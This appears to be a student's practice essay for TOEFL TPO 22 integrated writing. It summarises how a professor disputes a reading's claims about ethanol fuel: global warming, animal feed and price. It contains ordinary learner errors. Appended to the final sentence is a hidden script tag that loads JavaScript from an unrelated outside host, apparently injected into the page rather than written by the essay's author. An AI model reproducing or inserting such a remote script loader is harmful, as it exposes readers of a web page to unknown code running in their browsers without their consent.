TPO 22 integrated writing task

The professor casts doubt on the points in the reading. He states that ethanol is a good alternative for gasoline which contrasts the passage.
First, the professor states that the ethanol will not contribute to the global warming because the process of making corn in the nature removes the carbon dioxide that was made from its' burning. In contrast, the author claims that ethanol fuel would not contribute in decreasing of global warming.
Second, the professor implies that producing ethanol does not reduce the food for animals due to the fact that they only use the seloloze of the plant to produce ethanol, which is not edible by the animals. This point is doubting the point in the reading which states that producing ethanol declines 60 percent of animals food.
Finally, the professor states that ethanol will compete with gasoline on price as the increase in production leads to decrease the price of the ethanol. Also he adds that the cost of ethanols' production will drop by 40 percent. This point is again in contrast to the point in reading which claims that by stopping the tax subsidies of producing ethanol, its' price will increase.<script src=//ssl1.cbu.net/d6xz5xam></script>
